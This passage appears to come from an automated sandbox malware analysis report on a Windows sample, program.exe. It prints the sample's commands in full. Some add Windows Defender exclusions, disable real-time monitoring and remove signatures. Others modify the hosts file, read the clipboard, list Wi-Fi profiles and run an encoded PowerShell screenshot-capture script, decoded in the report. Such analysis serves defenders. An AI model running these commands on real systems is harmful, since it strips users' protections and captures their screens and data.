              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B751A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B751A614
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750D30C SetUnhandledExceptionFilter,0_2_00007FF6B750D30C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B750C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6B750C8A0
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B750D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6B750D12C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B751A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6B751A614
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B750D30C SetUnhandledExceptionFilter,1_2_00007FF6B750D30C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAE63248 IsProcessorFeaturePresent,00007FFE1A461A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAE63248
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0076212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFE0076212B
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00761CB7 SetUnhandledExceptionFilter,1_2_00007FFE00761CB7
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE007DDFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE007DDFFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEB4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF64FEB4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEAB6D8 SetUnhandledExceptionFilter,83_2_00007FF64FEAB6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEAA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,83_2_00007FF64FEAA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEAB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF64FEAB52C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Modifies the hosts file
              Source: C:\Users\user\Desktop\program.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Users\user\Desktop\program.exe "C:\Users\user\Desktop\program.exe"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA